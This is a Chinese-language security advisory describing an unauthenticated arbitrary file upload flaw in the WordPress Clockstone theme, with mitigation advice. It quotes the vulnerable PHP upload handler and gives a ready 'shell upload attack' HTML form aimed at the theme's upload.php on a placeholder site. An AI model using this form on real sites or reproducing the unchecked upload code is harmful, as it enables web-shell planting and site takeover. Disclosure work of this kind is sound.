eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

WordPress主題漏洞 任意文件上傳漏洞及修復

漏洞主題版本:cmsmasters Clockstone

 
 
Clockstone是Wordpress的終極主題,一個單一的主題內集合了眾多功能。
 
WordPress的Clockstone主題和其他主題存在文件上傳漏洞。存在該漏洞的原因是由於問題代碼對已登錄的用戶沒有進行身份驗證操作。攻擊者可通過上傳任意文件到受害者站點,進而獲取站點的訪問權限。
 
主題內有漏洞的代碼:
 
##############################################################
#   <?php
#
#   if ($_POST['url']){ $uploaddir = $_POST['url']; }
#
#   $first_filename = $_FILES['uploadfile']['name'];
#
#   $filename = md5($first_filename);
#
#   $ext = substr($first_filename, 1 + strrpos($first_filename, ‘.’));
#
#   $file = $uploaddir . basename($filename.’.’.$ext);
#
#   if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
#       echo basename($filename.’.’.$ext);
#   } else {
#       echo ‘error’;
#   }
#
#   ?>
測試:
 
 
##############################################################
#   Shell upload attack:<br />
#   <form enctype=”multipart/form-data” action=”http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php” method=”post”>
#   <input type=”text” name=”url” value=”./” /><br />
#   Please choose a file: <input name=”uploadfile” type=”file” /><br />
#   <input type=”submit” value=”Upload” />
#   </form>
##############################################################
 
臨時解決方法:
 
如果您不能立刻安裝補丁或者升級,建議您採取以下措施以降低威脅:
 
* 禁用CMSMasters主題
 
廠商補丁:
 
cmsmasters
———-
目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本:
 
http://themeforest.net/item/clockstone-ultimate-wordpress-theme/306607

分享: